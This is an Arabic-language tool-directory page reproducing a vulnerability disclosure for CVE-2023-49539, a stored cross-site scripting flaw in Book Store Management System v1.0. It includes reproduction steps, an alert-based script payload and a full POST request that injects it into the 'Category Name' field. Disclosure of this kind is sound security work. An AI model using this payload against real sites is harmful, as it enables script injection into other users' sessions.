Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-49539 — نظام إدارة متجر الكتب الإصدار 1.0 - ثغرة برمجة نصية عبر المواقع (XSS) في "index.php/category" - الحقل المعرض للخطر: "Category Name" | Kitploit
أدوات/GitHubGitHub/geraldoalcantara/cve-2023-49539
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubgeraldoalcantara/cve-2023-49539

CVE-2023-49539

نظام إدارة متجر الكتب الإصدار 1.0 - ثغرة برمجة نصية عبر المواقع (XSS) في "index.php/category" - الحقل المعرض للخطر: "Category Name"

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-49539

Book Store Management System v1.0 - ثغرة البرمجة النصية عبر المواقع (XSS) في "index.php/category" - الحقل المعرض للخطر: "اسم الفئة"

الوصف: تم اكتشاف أن نظام إدارة المكتبات Book Store Management System v1.0 يحتوي على ثغرة من نوع البرمجة النصية عبر المواقع (XSS) في "/bsms_ci/index.php/category". تسمح هذه الثغرة للمهاجمين بتنفيذ نصوص برمجية تعسفية من الويب أو HTML عبر إدخال حمولة معدّة في حقل "اسم الفئة".

إصدار المنتج المعرض للخطر: Book Store Management System v1.0
مؤلف CVE: Geraldo Alcântara
التاريخ: 29/11/2023
تم التأكيد في: 15/12/2023
CVE: CVE-2023-49539
تم الاختبار على: Windows

خطوات إعادة الإنتاج:

توجد الثغرة داخل صفحة "/bsms_ci/index.php/category/". على وجه التحديد، عند إنشاء/تعديل فئة، تم تحديد حقل "اسم الفئة" على أنه معرض للخطر. يمكن للمهاجمين استغلال هذه الثغرة عن طريق إدخال حمولة برمجة نصية عبر المواقع (XSS) في حقل "اسم الفئة" أثناء عملية إنشاء/تعديل الفئة.

الحمولة:

root@kitploit:~
<\td><script>alert(document.domain)</script>

الطلب:

root@kitploit:~
POST /bsms_ci/index.php/category/category_update HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/bsms_ci/index.php/category
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; ci_session=72ruij3r4688s92v273ncnqjm150uvu8
Upgrade-Insecure-Requests: 1

category_code_lama=12&category_code=12&category_name=%3c%5ctd%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e&edit=Save

المكتشف/الائتمان:
Geraldo Alcântara

تنزيل الأداة